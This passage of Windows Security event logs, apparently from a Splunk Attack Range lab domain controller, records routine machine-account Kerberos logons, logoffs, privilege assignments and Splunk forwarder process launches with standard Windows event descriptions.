SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264955
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x897490
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264954
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x897490
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53853
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:47:26 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264953
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x897490
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:47:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264961
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x898125
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:47:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264960
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x898125
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53861
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:47:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264959
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x898125
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:48:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264962
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1440
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264964
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264963
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264965
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264966
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa24
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264968
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x183c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264967
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:48:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264971
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89BADD
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:48:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264970
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89BADD
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53874
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:48:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264969
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89BADD
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264972
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd44
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264985
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1610
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264984
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C4F3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264983
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C5E1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264982
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C629
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264981
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89CAE1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53880
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264980
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89CAE1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264979
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1050
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264978
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89C629
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 53879
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
